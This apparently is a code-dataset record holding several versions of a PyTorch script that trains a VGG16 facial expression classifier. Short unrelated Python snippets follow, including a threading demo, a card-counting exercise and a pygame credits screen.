train_dataset = FER(train_data_path, image_size=64, mode='train')
train_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle
=True)
valid_data_path = '../../../data/face_data'
valid_dataset = FER(valid_data_path, image_size=64, mode='val')
valid_dataloader = DataLoader(valid_dataset, batch_size=batch_size, shuffle
=False)
model = md.vgg16_bn(num_classes=3).to(device)
model.to(device)
criterion = torch.nn.CrossEntropyLoss().to(device)
optimizer = torch.optim.Adam(params=model.parameters(), lr=lr)
...
for epoch in range(epochs):
running_loss = 0
running_acc = 0
train_loss = 0
model.train()
for image, label in tqdm(train_dataloader, desc='Epoch [%d/%d]' % (
epoch + 1, epochs)):
optimizer.zero_grad()
image = image / 255.0
pred = model(image.float().transpose(3, 2).transpose(2, 1).to(device))
loss = criterion(pred, label.to(device))
loss.backward()
optimizer.step()
Softmax = torch.nn.Softmax(dim=1)
_, prediction_tr = torch.max(Softmax(pred), 1)
y_true_tr = label.cpu().detach().numpy()
y_pred_tr = prediction_tr.cpu().detach().numpy()
acc_tr = (label == prediction_tr.cpu()).sum().item() / pred.shape[0
] * 100
running_loss += loss * image.size(0)
running_acc += acc_tr * image.size(0)
train_loss = running_loss / len(train_dataset)
train_acc = running_acc / len(train_dataset)
print('>>> Train loss : %.4f - Train acc : %.4f' % (train_loss, train_acc))
running_loss = 0
running_acc = 0
model.eval()
with torch.no_grad():
for image, label in valid_dataloader:
image = image / 255.0
pred = model(image.float().transpose(3, 2).transpose(1, 2).to(
device))
loss = criterion(pred, label.to(device))
Softmax = torch.nn.Softmax(dim=1)
_, prediction = torch.max(Softmax(pred), 1)
y_true = label.cpu().detach().numpy()
y_pred = prediction.cpu().detach().numpy()
acc_tr = (label == prediction.cpu()).sum().item() / pred.shape[0
] * 100
running_loss += loss.item() * image.size(0)
running_acc += acc_tr * image.size(0)
valid_loss = running_loss / len(valid_dataset)
valid_acc = running_acc / len(valid_dataset)
print('>>> Valid loss : %.4f - Valid acc : %.4f\n' % (valid_loss,
valid_acc))
print(prediction)
print(label)
print()
if (epoch + 1) % 5 == 0:
save_path = os.path.join('.', 'save_')
if not os.path.exists(save_path):
os.makedirs(save_path)
torch.save(model, os.path.join(save_path,
'model_epoch%04d_loss_%.4f_acc_%.4f.ckpt' % (epoch, valid_loss,
valid_acc)))
<|reserved_special_token_1|>
import os
import torch
from data_loader import FER
from torch.utils.data import DataLoader
from tqdm import tqdm
# from tensorboardX import SummaryWriter
import model as md
# train_writer = SummaryWriter(log_dir="log_last_last_last/train")
# valid_writer = SummaryWriter(log_dir="log_last_last_last/valid")
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
# os.environ["CUDA_VISIBLE_DEVICES"] = "2"
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# Hyper-parameters
lr = 1e-5
epochs = 500
batch_size = 2
train_data_path = '../../../data/face_data'
train_dataset = FER(train_data_path , image_size=64, mode='train')
train_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle = True)
valid_data_path = '../../../data/face_data'
valid_dataset = FER(valid_data_path,image_size=64, mode='val')
valid_dataloader = DataLoader(valid_dataset, batch_size=batch_size, shuffle = False)
model = md.vgg16_bn(num_classes = 3).to(device)
# model_name = 'vgg16'
# feature_extract = True
# num_classes = 3
# model = md.init_pretrained_models(model_name, num_classes, feature_extract, use_pretrained=True)
model.to(device)
criterion = torch.nn.CrossEntropyLoss().to(device)
optimizer = torch.optim.Adam(params = model.parameters(), lr = lr)
...
for epoch in range(epochs):
running_loss = 0
running_acc = 0
train_loss = 0
model.train()
# ================== Training ==================
for image, label in tqdm(train_dataloader, desc="Epoch [%d/%d]" % (epoch + 1, epochs)):
optimizer.zero_grad() # Optimizer를 0으로 초기화
image = image / 255.
pred = model(image.float().transpose(3,2).transpose(2,1).to(device))
loss = criterion(pred, label.to(device))
loss.backward()
optimizer.step()
Softmax = torch.nn.Softmax(dim=1)
_, prediction_tr = torch.max(Softmax(pred), 1)
y_true_tr = label.cpu().detach().numpy()
y_pred_tr = prediction_tr.cpu().detach().numpy()
# acc = confusion_matrix(y_true, y_pred)
acc_tr = ((label == prediction_tr.cpu()).sum().item() / pred.shape[0]) * 100
# running_loss += loss.item()
running_loss += loss * image.size(0)
running_acc += acc_tr * image.size(0)
train_loss = running_loss / len(train_dataset)
train_acc = running_acc / len(train_dataset)
# loss_sum = tf.summary.scalar("train_loss", train_loss)
# acc_sum = tf.summary.scalar("train_accuracy", train_acc)
# writer = tf.summary.FileWriter("./abc")
# summary, _ = sess.run([loss_sum, epochs], feed_dict={x: loss_sum, y: epochs})
print('>>> Train loss : %.4f - Train acc : %.4f'% (train_loss, train_acc))
# train_acc = running_acc / len(train_dataloader)
# =================== Validation ===================
running_loss = 0
running_acc = 0
model.eval()
# model.load_state_dict(torch.load('filenname'))
with torch.no_grad():
# val_st ep = 0
for image, label in valid_dataloader:
image = image / 255.
pred = model(image.float().transpose(3,2).transpose(1,2).to(device))
loss = criterion(pred, label.to(device))
Softmax = torch.nn.Softmax(dim=1)
_, prediction = torch.max(Softmax(pred), 1)
y_true = label.cpu().detach().numpy()
y_pred = prediction.cpu().detach().numpy()
# acc = confusion_matrix(y_true, y_pred)
acc_tr = ((label == prediction.cpu()).sum().item() / pred.shape[0]) * 100
# running_acc += acc_tr
# running_loss += loss.item()
# val_step +=1
running_loss += loss.item() * image.size(0)
running_acc += acc_tr * image.size(0)
valid_loss = running_loss / len(valid_dataset)
valid_acc = running_acc / len(valid_dataset)
print(">>> Valid loss : %.4f - Valid acc : %.4f\n" % (valid_loss, valid_acc))
print(prediction)
print(label)
print()
# train_writer.add_scalar('loss', train_loss, epoch)
# train_writer.add_scalar('accuracy', train_acc, epoch)
# valid_writer.add_scalar('loss', valid_loss, epoch)
# valid_writer.add_scalar('accuracy', valid_acc, epoch)
if (epoch+1) % 5 == 0 :
save_path = os.path.join('.', 'save_')
if not os.path.exists(save_path):
os.makedirs(save_path)
torch.save(model, os.path.join(save_path, 'model_epoch%04d_loss_%.4f_acc_%.4f.ckpt'%(epoch, valid_loss, valid_acc)))
|
flexible
|
{
"blob_id": "c3aee5d822d48c9dc826f8f2f8d4a56e11513b9c",
"index": 2882,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nmodel.to(device)\n<mask token>\n...\nfor epoch in range(epochs):\n running_loss = 0\n running_acc = 0\n train_loss = 0\n model.train()\n for image, label in tqdm(train_dataloader, desc='Epoch [%d/%d]' % (\n epoch + 1, epochs)):\n optimizer.zero_grad()\n image = image / 255.0\n pred = model(image.float().transpose(3, 2).transpose(2, 1).to(device))\n loss = criterion(pred, label.to(device))\n loss.backward()\n optimizer.step()\n Softmax = torch.nn.Softmax(dim=1)\n _, prediction_tr = torch.max(Softmax(pred), 1)\n y_true_tr = label.cpu().detach().numpy()\n y_pred_tr = prediction_tr.cpu().detach().numpy()\n acc_tr = (label == prediction_tr.cpu()).sum().item() / pred.shape[0\n ] * 100\n running_loss += loss * image.size(0)\n running_acc += acc_tr * image.size(0)\n train_loss = running_loss / len(train_dataset)\n train_acc = running_acc / len(train_dataset)\n print('>>> Train loss : %.4f - Train acc : %.4f' % (train_loss, train_acc))\n running_loss = 0\n running_acc = 0\n model.eval()\n with torch.no_grad():\n for image, label in valid_dataloader:\n image = image / 255.0\n pred = model(image.float().transpose(3, 2).transpose(1, 2).to(\n device))\n loss = criterion(pred, label.to(device))\n Softmax = torch.nn.Softmax(dim=1)\n _, prediction = torch.max(Softmax(pred), 1)\n y_true = label.cpu().detach().numpy()\n y_pred = prediction.cpu().detach().numpy()\n acc_tr = (label == prediction.cpu()).sum().item() / pred.shape[0\n ] * 100\n running_loss += loss.item() * image.size(0)\n running_acc += acc_tr * image.size(0)\n valid_loss = running_loss / len(valid_dataset)\n valid_acc = running_acc / len(valid_dataset)\n print('>>> Valid loss : %.4f - Valid acc : %.4f\\n' % (valid_loss,\n valid_acc))\n print(prediction)\n print(label)\n print()\n if (epoch + 1) % 5 == 0:\n save_path = os.path.join('.', 'save_')\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n torch.save(model, os.path.join(save_path, \n 'model_epoch%04d_loss_%.4f_acc_%.4f.ckpt' % (epoch, valid_loss,\n valid_acc)))\n",
"step-3": "<mask token>\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nlr = 1e-05\nepochs = 500\nbatch_size = 2\ntrain_data_path = '../../../data/face_data'\ntrain_dataset = FER(train_data_path, image_size=64, mode='train')\ntrain_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle\n =True)\nvalid_data_path = '../../../data/face_data'\nvalid_dataset = FER(valid_data_path, image_size=64, mode='val')\nvalid_dataloader = DataLoader(valid_dataset, batch_size=batch_size, shuffle\n =False)\nmodel = md.vgg16_bn(num_classes=3).to(device)\nmodel.to(device)\ncriterion = torch.nn.CrossEntropyLoss().to(device)\noptimizer = torch.optim.Adam(params=model.parameters(), lr=lr)\n...\nfor epoch in range(epochs):\n running_loss = 0\n running_acc = 0\n train_loss = 0\n model.train()\n for image, label in tqdm(train_dataloader, desc='Epoch [%d/%d]' % (\n epoch + 1, epochs)):\n optimizer.zero_grad()\n image = image / 255.0\n pred = model(image.float().transpose(3, 2).transpose(2, 1).to(device))\n loss = criterion(pred, label.to(device))\n loss.backward()\n optimizer.step()\n Softmax = torch.nn.Softmax(dim=1)\n _, prediction_tr = torch.max(Softmax(pred), 1)\n y_true_tr = label.cpu().detach().numpy()\n y_pred_tr = prediction_tr.cpu().detach().numpy()\n acc_tr = (label == prediction_tr.cpu()).sum().item() / pred.shape[0\n ] * 100\n running_loss += loss * image.size(0)\n running_acc += acc_tr * image.size(0)\n train_loss = running_loss / len(train_dataset)\n train_acc = running_acc / len(train_dataset)\n print('>>> Train loss : %.4f - Train acc : %.4f' % (train_loss, train_acc))\n running_loss = 0\n running_acc = 0\n model.eval()\n with torch.no_grad():\n for image, label in valid_dataloader:\n image = image / 255.0\n pred = model(image.float().transpose(3, 2).transpose(1, 2).to(\n device))\n loss = criterion(pred, label.to(device))\n Softmax = torch.nn.Softmax(dim=1)\n _, prediction = torch.max(Softmax(pred), 1)\n y_true = label.cpu().detach().numpy()\n y_pred = prediction.cpu().detach().numpy()\n acc_tr = (label == prediction.cpu()).sum().item() / pred.shape[0\n ] * 100\n running_loss += loss.item() * image.size(0)\n running_acc += acc_tr * image.size(0)\n valid_loss = running_loss / len(valid_dataset)\n valid_acc = running_acc / len(valid_dataset)\n print('>>> Valid loss : %.4f - Valid acc : %.4f\\n' % (valid_loss,\n valid_acc))\n print(prediction)\n print(label)\n print()\n if (epoch + 1) % 5 == 0:\n save_path = os.path.join('.', 'save_')\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n torch.save(model, os.path.join(save_path, \n 'model_epoch%04d_loss_%.4f_acc_%.4f.ckpt' % (epoch, valid_loss,\n valid_acc)))\n",
"step-4": "import os\nimport torch\nfrom data_loader import FER\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nimport model as md\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nlr = 1e-05\nepochs = 500\nbatch_size = 2\ntrain_data_path = '../../../data/face_data'\ntrain_dataset = FER(train_data_path, image_size=64, mode='train')\ntrain_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle\n =True)\nvalid_data_path = '../../../data/face_data'\nvalid_dataset = FER(valid_data_path, image_size=64, mode='val')\nvalid_dataloader = DataLoader(valid_dataset, batch_size=batch_size, shuffle\n =False)\nmodel = md.vgg16_bn(num_classes=3).to(device)\nmodel.to(device)\ncriterion = torch.nn.CrossEntropyLoss().to(device)\noptimizer = torch.optim.Adam(params=model.parameters(), lr=lr)\n...\nfor epoch in range(epochs):\n running_loss = 0\n running_acc = 0\n train_loss = 0\n model.train()\n for image, label in tqdm(train_dataloader, desc='Epoch [%d/%d]' % (\n epoch + 1, epochs)):\n optimizer.zero_grad()\n image = image / 255.0\n pred = model(image.float().transpose(3, 2).transpose(2, 1).to(device))\n loss = criterion(pred, label.to(device))\n loss.backward()\n optimizer.step()\n Softmax = torch.nn.Softmax(dim=1)\n _, prediction_tr = torch.max(Softmax(pred), 1)\n y_true_tr = label.cpu().detach().numpy()\n y_pred_tr = prediction_tr.cpu().detach().numpy()\n acc_tr = (label == prediction_tr.cpu()).sum().item() / pred.shape[0\n ] * 100\n running_loss += loss * image.size(0)\n running_acc += acc_tr * image.size(0)\n train_loss = running_loss / len(train_dataset)\n train_acc = running_acc / len(train_dataset)\n print('>>> Train loss : %.4f - Train acc : %.4f' % (train_loss, train_acc))\n running_loss = 0\n running_acc = 0\n model.eval()\n with torch.no_grad():\n for image, label in valid_dataloader:\n image = image / 255.0\n pred = model(image.float().transpose(3, 2).transpose(1, 2).to(\n device))\n loss = criterion(pred, label.to(device))\n Softmax = torch.nn.Softmax(dim=1)\n _, prediction = torch.max(Softmax(pred), 1)\n y_true = label.cpu().detach().numpy()\n y_pred = prediction.cpu().detach().numpy()\n acc_tr = (label == prediction.cpu()).sum().item() / pred.shape[0\n ] * 100\n running_loss += loss.item() * image.size(0)\n running_acc += acc_tr * image.size(0)\n valid_loss = running_loss / len(valid_dataset)\n valid_acc = running_acc / len(valid_dataset)\n print('>>> Valid loss : %.4f - Valid acc : %.4f\\n' % (valid_loss,\n valid_acc))\n print(prediction)\n print(label)\n print()\n if (epoch + 1) % 5 == 0:\n save_path = os.path.join('.', 'save_')\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n torch.save(model, os.path.join(save_path, \n 'model_epoch%04d_loss_%.4f_acc_%.4f.ckpt' % (epoch, valid_loss,\n valid_acc)))\n",
"step-5": "import os\r\nimport torch\r\nfrom data_loader import FER\r\nfrom torch.utils.data import DataLoader\r\nfrom tqdm import tqdm\r\n# from tensorboardX import SummaryWriter\r\nimport model as md\r\n\r\n\r\n\r\n# train_writer = SummaryWriter(log_dir=\"log_last_last_last/train\")\r\n# valid_writer = SummaryWriter(log_dir=\"log_last_last_last/valid\")\r\n\r\n# os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\r\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\r\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\n# Hyper-parameters\r\nlr = 1e-5\r\nepochs = 500\r\nbatch_size = 2\r\n\r\ntrain_data_path = '../../../data/face_data'\r\ntrain_dataset = FER(train_data_path , image_size=64, mode='train')\r\ntrain_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle = True)\r\n\r\nvalid_data_path = '../../../data/face_data'\r\nvalid_dataset = FER(valid_data_path,image_size=64, mode='val')\r\nvalid_dataloader = DataLoader(valid_dataset, batch_size=batch_size, shuffle = False)\r\n\r\n\r\nmodel = md.vgg16_bn(num_classes = 3).to(device)\r\n\r\n\r\n\r\n# model_name = 'vgg16'\r\n# feature_extract = True\r\n# num_classes = 3\r\n# model = md.init_pretrained_models(model_name, num_classes, feature_extract, use_pretrained=True)\r\n\r\n\r\nmodel.to(device)\r\ncriterion = torch.nn.CrossEntropyLoss().to(device)\r\noptimizer = torch.optim.Adam(params = model.parameters(), lr = lr)\r\n\r\n...\r\nfor epoch in range(epochs):\r\n running_loss = 0\r\n running_acc = 0\r\n train_loss = 0\r\n model.train()\r\n\r\n # ================== Training ==================\r\n for image, label in tqdm(train_dataloader, desc=\"Epoch [%d/%d]\" % (epoch + 1, epochs)):\r\n optimizer.zero_grad() # Optimizer를 0으로 초기화\r\n image = image / 255.\r\n pred = model(image.float().transpose(3,2).transpose(2,1).to(device))\r\n loss = criterion(pred, label.to(device))\r\n\r\n loss.backward()\r\n optimizer.step()\r\n\r\n Softmax = torch.nn.Softmax(dim=1)\r\n _, prediction_tr = torch.max(Softmax(pred), 1)\r\n\r\n y_true_tr = label.cpu().detach().numpy()\r\n y_pred_tr = prediction_tr.cpu().detach().numpy()\r\n # acc = confusion_matrix(y_true, y_pred)\r\n\r\n acc_tr = ((label == prediction_tr.cpu()).sum().item() / pred.shape[0]) * 100\r\n\r\n\r\n # running_loss += loss.item()\r\n running_loss += loss * image.size(0)\r\n running_acc += acc_tr * image.size(0)\r\n\r\n train_loss = running_loss / len(train_dataset)\r\n train_acc = running_acc / len(train_dataset)\r\n\r\n # loss_sum = tf.summary.scalar(\"train_loss\", train_loss)\r\n # acc_sum = tf.summary.scalar(\"train_accuracy\", train_acc)\r\n\r\n\r\n # writer = tf.summary.FileWriter(\"./abc\")\r\n\r\n # summary, _ = sess.run([loss_sum, epochs], feed_dict={x: loss_sum, y: epochs})\r\n\r\n\r\n print('>>> Train loss : %.4f - Train acc : %.4f'% (train_loss, train_acc))\r\n # train_acc = running_acc / len(train_dataloader)\r\n\r\n\r\n # =================== Validation ===================\r\n running_loss = 0\r\n running_acc = 0\r\n model.eval()\r\n # model.load_state_dict(torch.load('filenname'))\r\n\r\n\r\n\r\n with torch.no_grad():\r\n # val_st ep = 0\r\n for image, label in valid_dataloader:\r\n image = image / 255.\r\n\r\n pred = model(image.float().transpose(3,2).transpose(1,2).to(device))\r\n loss = criterion(pred, label.to(device))\r\n\r\n\r\n Softmax = torch.nn.Softmax(dim=1)\r\n _, prediction = torch.max(Softmax(pred), 1)\r\n\r\n y_true = label.cpu().detach().numpy()\r\n y_pred = prediction.cpu().detach().numpy()\r\n # acc = confusion_matrix(y_true, y_pred)\r\n acc_tr = ((label == prediction.cpu()).sum().item() / pred.shape[0]) * 100\r\n # running_acc += acc_tr\r\n\r\n # running_loss += loss.item()\r\n # val_step +=1\r\n running_loss += loss.item() * image.size(0)\r\n running_acc += acc_tr * image.size(0)\r\n\r\n valid_loss = running_loss / len(valid_dataset)\r\n valid_acc = running_acc / len(valid_dataset)\r\n\r\n print(\">>> Valid loss : %.4f - Valid acc : %.4f\\n\" % (valid_loss, valid_acc))\r\n print(prediction)\r\n print(label)\r\n print()\r\n\r\n # train_writer.add_scalar('loss', train_loss, epoch)\r\n # train_writer.add_scalar('accuracy', train_acc, epoch)\r\n # valid_writer.add_scalar('loss', valid_loss, epoch)\r\n # valid_writer.add_scalar('accuracy', valid_acc, epoch)\r\n\r\n if (epoch+1) % 5 == 0 :\r\n save_path = os.path.join('.', 'save_')\r\n if not os.path.exists(save_path):\r\n os.makedirs(save_path)\r\n torch.save(model, os.path.join(save_path, 'model_epoch%04d_loss_%.4f_acc_%.4f.ckpt'%(epoch, valid_loss, valid_acc)))\r\n\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def sleeping():
time.sleep(5)
print('Ended')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def sleeping():
time.sleep(5)
print('Ended')
Thread(target=sleeping, daemon=True).start()
print('Hello world')
time.sleep(5.5)
<|reserved_special_token_1|>
from threading import Thread
import time
def sleeping():
time.sleep(5)
print('Ended')
Thread(target=sleeping, daemon=True).start()
print('Hello world')
time.sleep(5.5)
|
flexible
|
{
"blob_id": "628fdf848079d0ecf5bf4f5bd46e07ad6cd10358",
"index": 5070,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef sleeping():\n time.sleep(5)\n print('Ended')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef sleeping():\n time.sleep(5)\n print('Ended')\n\n\nThread(target=sleeping, daemon=True).start()\nprint('Hello world')\ntime.sleep(5.5)\n",
"step-4": "from threading import Thread\nimport time\n\n\ndef sleeping():\n time.sleep(5)\n print('Ended')\n\n\nThread(target=sleeping, daemon=True).start()\nprint('Hello world')\ntime.sleep(5.5)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
T = int(input())
for cnt in range(1, T + 1):
S = input()
S_list = []
card = {'S': 13, 'D': 13, 'H': 13, 'C': 13}
print('#' + str(cnt), end=' ')
for i in range(0, len(S), 3):
S_list.append(S[i:i + 3])
if len(set(S_list)) != len(S_list):
print('ERROR')
else:
for i in S_list:
card[i[0]] -= 1
print(*card.values())
|
normal
|
{
"blob_id": "45750152313fd3670867c61d0173e4cb11a806ba",
"index": 4468,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor cnt in range(1, T + 1):\n S = input()\n S_list = []\n card = {'S': 13, 'D': 13, 'H': 13, 'C': 13}\n print('#' + str(cnt), end=' ')\n for i in range(0, len(S), 3):\n S_list.append(S[i:i + 3])\n if len(set(S_list)) != len(S_list):\n print('ERROR')\n else:\n for i in S_list:\n card[i[0]] -= 1\n print(*card.values())\n",
"step-3": "T = int(input())\nfor cnt in range(1, T + 1):\n S = input()\n S_list = []\n card = {'S': 13, 'D': 13, 'H': 13, 'C': 13}\n print('#' + str(cnt), end=' ')\n for i in range(0, len(S), 3):\n S_list.append(S[i:i + 3])\n if len(set(S_list)) != len(S_list):\n print('ERROR')\n else:\n for i in S_list:\n card[i[0]] -= 1\n print(*card.values())\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from . import find_resault
from . import sql
|
flexible
|
{
"blob_id": "6f05d1915cd2e123dd72233b59d4de43fd724035",
"index": 7743,
"step-1": "<mask token>\n",
"step-2": "from . import find_resault\nfrom . import sql\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
<|reserved_special_token_0|>
def draw_text(surf, text, size, x, y):
font_name = pygame.font.match_font('OCR A Extended')
font = pygame.font.Font(font_name, size)
text_surface = font.render(text, True, WHITE)
text_rect = text_surface.get_rect()
text_rect.midtop = x, y
surf.blit(text_surface, text_rect)
def button(msg, x, y, w, h, ic, ac, action=None):
mouse = pygame.mouse.get_pos()
click = pygame.mouse.get_pressed()
print(click)
if x + w > mouse[0] > x and y + h > mouse[1] > y:
pygame.draw.rect(screen, ac, (x, y, w, h))
if click[0] == 1 and action != None:
if action == quit:
pygame.quit()
quit()
else:
pygame.draw.rect(screen, ic, (x, y, w, h))
def main():
pygame.init()
pygame.mixer.init()
screen = pygame.display.set_mode((1000, 800))
pygame.display.set_caption('Credits')
background = pygame.image.load(os.path.join(img_folder, 'STARS1.jpg')
).convert_alpha()
clock = pygame.time.Clock()
start_ticks = pygame.time.get_ticks()
screen.blit(background, (0, 0))
pygame.display.flip()
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
return
quit()
screen.blit(background, (0, 0))
pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))
draw_text(screen, 'Credits', 60, 500, 100)
draw_text(screen, 'Vincent', 30, 500, 250)
draw_text(screen, 'Chevery', 30, 500, 330)
draw_text(screen, 'Charlie', 30, 500, 410)
draw_text(screen, 'Julian', 30, 500, 490)
draw_text(screen, 'Sheriyar', 30, 500, 570)
draw_text(screen, 'Julian', 30, 500, 650)
mouse = pygame.mouse.get_pos()
if 400 + 190 > mouse[0] > 400 and 650 + 60 > mouse[1] > 650:
pygame.draw.rect(screen, GRAY80, (400, 650, 190, 60))
else:
pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))
draw_text(screen, 'EXIT', 40, 488, 660)
button('EXIT', 400, 650, 190, 60, GRAY, GRAY80, quit)
pygame.display.flip()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def draw_text(surf, text, size, x, y):
font_name = pygame.font.match_font('OCR A Extended')
font = pygame.font.Font(font_name, size)
text_surface = font.render(text, True, WHITE)
text_rect = text_surface.get_rect()
text_rect.midtop = x, y
surf.blit(text_surface, text_rect)
def button(msg, x, y, w, h, ic, ac, action=None):
mouse = pygame.mouse.get_pos()
click = pygame.mouse.get_pressed()
print(click)
if x + w > mouse[0] > x and y + h > mouse[1] > y:
pygame.draw.rect(screen, ac, (x, y, w, h))
if click[0] == 1 and action != None:
if action == quit:
pygame.quit()
quit()
else:
pygame.draw.rect(screen, ic, (x, y, w, h))
def main():
pygame.init()
pygame.mixer.init()
screen = pygame.display.set_mode((1000, 800))
pygame.display.set_caption('Credits')
background = pygame.image.load(os.path.join(img_folder, 'STARS1.jpg')
).convert_alpha()
clock = pygame.time.Clock()
start_ticks = pygame.time.get_ticks()
screen.blit(background, (0, 0))
pygame.display.flip()
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
return
quit()
screen.blit(background, (0, 0))
pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))
draw_text(screen, 'Credits', 60, 500, 100)
draw_text(screen, 'Vincent', 30, 500, 250)
draw_text(screen, 'Chevery', 30, 500, 330)
draw_text(screen, 'Charlie', 30, 500, 410)
draw_text(screen, 'Julian', 30, 500, 490)
draw_text(screen, 'Sheriyar', 30, 500, 570)
draw_text(screen, 'Julian', 30, 500, 650)
mouse = pygame.mouse.get_pos()
if 400 + 190 > mouse[0] > 400 and 650 + 60 > mouse[1] > 650:
pygame.draw.rect(screen, GRAY80, (400, 650, 190, 60))
else:
pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))
draw_text(screen, 'EXIT', 40, 488, 660)
button('EXIT', 400, 650, 190, 60, GRAY, GRAY80, quit)
pygame.display.flip()
if __name__ == '__main__':
main()
pygame.quit()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
WIDTH = 1000
HEIGHT = 800
FPS = 60
BLACK = 0, 0, 0
WHITE = 255, 255, 255
RED = 255, 0, 0
GREEN = 0, 255, 0
BLUE = 0, 0, 255
YELLOW = 255, 255, 0
GRAY80 = 204, 204, 204
GRAY = 26, 26, 26
screen = pygame.display.set_mode((1000, 800))
game_folder = os.path.dirname(__file__)
img_folder = os.path.join(game_folder, 'img')
def draw_text(surf, text, size, x, y):
font_name = pygame.font.match_font('OCR A Extended')
font = pygame.font.Font(font_name, size)
text_surface = font.render(text, True, WHITE)
text_rect = text_surface.get_rect()
text_rect.midtop = x, y
surf.blit(text_surface, text_rect)
def button(msg, x, y, w, h, ic, ac, action=None):
mouse = pygame.mouse.get_pos()
click = pygame.mouse.get_pressed()
print(click)
if x + w > mouse[0] > x and y + h > mouse[1] > y:
pygame.draw.rect(screen, ac, (x, y, w, h))
if click[0] == 1 and action != None:
if action == quit:
pygame.quit()
quit()
else:
pygame.draw.rect(screen, ic, (x, y, w, h))
def main():
pygame.init()
pygame.mixer.init()
screen = pygame.display.set_mode((1000, 800))
pygame.display.set_caption('Credits')
background = pygame.image.load(os.path.join(img_folder, 'STARS1.jpg')
).convert_alpha()
clock = pygame.time.Clock()
start_ticks = pygame.time.get_ticks()
screen.blit(background, (0, 0))
pygame.display.flip()
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
return
quit()
screen.blit(background, (0, 0))
pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))
draw_text(screen, 'Credits', 60, 500, 100)
draw_text(screen, 'Vincent', 30, 500, 250)
draw_text(screen, 'Chevery', 30, 500, 330)
draw_text(screen, 'Charlie', 30, 500, 410)
draw_text(screen, 'Julian', 30, 500, 490)
draw_text(screen, 'Sheriyar', 30, 500, 570)
draw_text(screen, 'Julian', 30, 500, 650)
mouse = pygame.mouse.get_pos()
if 400 + 190 > mouse[0] > 400 and 650 + 60 > mouse[1] > 650:
pygame.draw.rect(screen, GRAY80, (400, 650, 190, 60))
else:
pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))
draw_text(screen, 'EXIT', 40, 488, 660)
button('EXIT', 400, 650, 190, 60, GRAY, GRAY80, quit)
pygame.display.flip()
if __name__ == '__main__':
main()
pygame.quit()
<|reserved_special_token_1|>
import os, pygame
import sys
from os import path
from random import choice
WIDTH = 1000
HEIGHT = 800
FPS = 60
BLACK = 0, 0, 0
WHITE = 255, 255, 255
RED = 255, 0, 0
GREEN = 0, 255, 0
BLUE = 0, 0, 255
YELLOW = 255, 255, 0
GRAY80 = 204, 204, 204
GRAY = 26, 26, 26
screen = pygame.display.set_mode((1000, 800))
game_folder = os.path.dirname(__file__)
img_folder = os.path.join(game_folder, 'img')
def draw_text(surf, text, size, x, y):
font_name = pygame.font.match_font('OCR A Extended')
font = pygame.font.Font(font_name, size)
text_surface = font.render(text, True, WHITE)
text_rect = text_surface.get_rect()
text_rect.midtop = x, y
surf.blit(text_surface, text_rect)
def button(msg, x, y, w, h, ic, ac, action=None):
mouse = pygame.mouse.get_pos()
click = pygame.mouse.get_pressed()
print(click)
if x + w > mouse[0] > x and y + h > mouse[1] > y:
pygame.draw.rect(screen, ac, (x, y, w, h))
if click[0] == 1 and action != None:
if action == quit:
pygame.quit()
quit()
else:
pygame.draw.rect(screen, ic, (x, y, w, h))
def main():
pygame.init()
pygame.mixer.init()
screen = pygame.display.set_mode((1000, 800))
pygame.display.set_caption('Credits')
background = pygame.image.load(os.path.join(img_folder, 'STARS1.jpg')
).convert_alpha()
clock = pygame.time.Clock()
start_ticks = pygame.time.get_ticks()
screen.blit(background, (0, 0))
pygame.display.flip()
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
return
quit()
screen.blit(background, (0, 0))
pygame.draw.rect(screen, GRAY, (400, 650, 190, 60))
draw_text(screen, 'Credits', 60, 500, 100)
draw_text(screen, 'Vincent', 30, 500, 250)
draw_text(screen, 'Chevery', 30, 500, 330)
draw_text(screen, 'Charlie', 30, 500, 410)
draw_text(screen, 'Julian', 30, 500, 490)
draw_text(screen, 'Sheriyar', 30, 500, 570)
draw_text(screen, 'Julian', 30, 500, 650)
mouse = pygame.mouse.get_pos()
if 400 + 190 > mouse[0] > 400 and 650 + 60 > mouse[1] > 650:
pygame.draw.rect(screen, GRAY80, (400, 650, 190, 60))
else:
